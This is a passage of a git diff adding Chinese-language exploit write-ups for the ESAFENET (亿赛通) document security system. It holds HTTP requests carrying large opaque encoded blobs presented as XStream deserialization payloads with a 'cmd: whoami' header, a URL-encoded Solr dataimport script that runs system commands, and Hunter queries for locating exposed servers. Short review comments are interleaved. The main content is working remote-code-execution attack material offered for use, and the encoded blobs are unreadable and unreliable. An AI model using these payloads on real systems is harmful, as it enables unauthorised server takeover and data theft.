JPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLO
HLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBP
MJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPH
OFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIB
EEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKEL
IPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706613497965-794e01ba-5634-4f39-9e7b-455e2dd344a0.png](./img/Rr2cMZleZrlHwlbu/1706613497965-794e01ba-5634-4f39-9e7b-455e2dd344a0-897064.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ewq00b57bhtr68ry> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md new file mode 100644 index 0000000..55195e0 --- /dev/null +++ b/亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md 
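Review bot: the request in 亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md hard-codes the author's lab target (`Host: 192.168.31.208:8090`) and an out-of-band `cmd: whoami` header without marking either as a placeholder, and its body is roughly 14 KB (`Content-Length: 14756`) of opaque uppercase letters whose encoding is not stated, so nothing in the file lets a reviewer confirm that the body is the XStream document the title claims. The same body (identical visible start `NNLINELBIIKEOGPIFLNMHIPNN...`) is committed again verbatim in the outgoingServlet write-up that follows, and its tail also matches the body in the 360天擎 loglastsync file earlier in this patch; keep one described copy and reference it from the other write-ups, and fill in the 影响版本 section, which currently names only the product, with the affected version range and a fix reference.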
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统outgoingServlet存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统outgoingServlet存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/9ub3M2YstuwfNIbt/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-292030.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/outgoingServlet HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.31.208:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDA
+``` + +![1706614611171-5819f3fa-4837-4780-82aa-2adb5d6f4816.png](./img/9ub3M2YstuwfNIbt/1706614611171-5819f3fa-4837-4780-82aa-2adb5d6f4816-179517.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yd77d4ck7exegl1x> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..6ea2c19 --- /dev/null 
+++ b/亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统permissionApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统permissionApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/FWq4b7eTAr1EZ3xC/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-609715.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/permissionApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.31.208:8090 +cmd: whoami +Content-Length: 14756 + 
+``` + +![1706613643120-ab50dae9-d908-47dc-8790-596fc500c895.png](./img/FWq4b7eTAr1EZ3xC/1706613643120-ab50dae9-d908-47dc-8790-596fc500c895-888872.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lnnfdl21xfvlxxzk> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统solr远程命令执行漏洞.md b/亿赛通电子文档安全管理系统solr远程命令执行漏洞.md new file mode 100644 index 0000000..d1684cc --- /dev/null +++ b/亿赛通电子文档安全管理系统solr远程命令执行漏洞.md 
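Review bot: the `Host: 192.168.31.208:8090` header in the permissionApp request is a lab address that leaked into the PoC; use the `xx.xx.xx.xx` placeholder the sibling files use. The 影响版本 section names only the product, so a reader cannot tell whether a fixed build exists; add the affected and fixed versions or a vendor reference. The request as written also gives defenders something concrete to alert on: a POST to `/CDGServer3/permissionApp` with `Content-Type: text/xml` and a non-standard `cmd` request header, neither of which a normal client should send.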
@@ -0,0 +1,45 @@ +# 亿赛通电子文档安全管理系统solr远程命令执行漏洞 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞,未经授权的攻击者可通过此漏洞执行任意指令,从而获取服务器权限。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/cfnJVGCzkeilIbJP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-187174.png) + +# 四、漏洞复现 +1. 访问以下POC,出现如下情况表达可能存在漏洞 + +```plain +/solr/flow/dataimport +``` + +![1693912289560-07146346-38c6-403c-822d-ac28e0b0a78c.png](./img/cfnJVGCzkeilIbJP/1693912289560-07146346-38c6-403c-822d-ac28e0b0a78c-145681.png) + +2. 通过exp执行命令 + +```plain +POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%
